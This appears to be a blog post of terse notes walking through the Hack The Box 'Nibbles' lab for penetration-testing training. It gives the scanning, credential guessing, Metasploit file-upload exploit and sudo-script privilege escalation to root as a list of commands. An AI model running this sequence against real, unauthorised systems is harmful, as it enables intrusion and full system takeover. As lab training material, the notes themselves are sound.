TCM PEH Hacking Nibbles Notes
HTB Nibbles
Recording strokes to derive methodology
nmap -A -T4 -p- 10.10.10.75
Noted port 22 open
Noted port 80 open
Noted Ubuntu OS
searchsploit apache 2.4
Visited 10.10.10.75:80 in browser
Viewed wappalyzer extension, noted Ubuntu
Viewed source
Noted comment pointing to nibble blog directory
Visited /nibbleblog
Noted more links
Viewed source
searchsploit nibbles
searchsploit nibble
Noted nibbleblog 3 result SQLi
Noted nibbleblog 4.0.3 Arb File Upload
msfconsole
search nibble
use exploit/multi/http/nibbleblog_file_upload
info
Noted that this allows AUTHENTICATED remote attacker to blahblahblah
dirbuster&
http://10.10.10.75:80
go faster
/usr/share/wordlist/dirbuster/medium
/nibbleblog
php
Start
Review tab
Visited /nibbleblog/admin.php
Logged in with Admin:nibbles
Visited Settings
Noted nibbleblog 4.0.3
In msfconsole
options
set password nibbles
set username admin
set rhosts 10.10.10.75
set targeturi nibbleblog
options
exploit
Noted session created
sysinfo
getuid
shell
pwd
cd /home
whoami
cd nibbler
ls -lha
history
cat .bash_history
sudo -l
mkdir personal
cd personal
mkdir stuff
pwd
echo “bash -i” > monitor.sh
chmod +x monitor.sh
sudo monitor.sh
whoami
Noted nibbler, still
sudo /home/nibbler/personal/stuff/monitor.sh
whoami
Noted root
Let me know what you think of this article on twitter @cpardue09 or leave a comment below!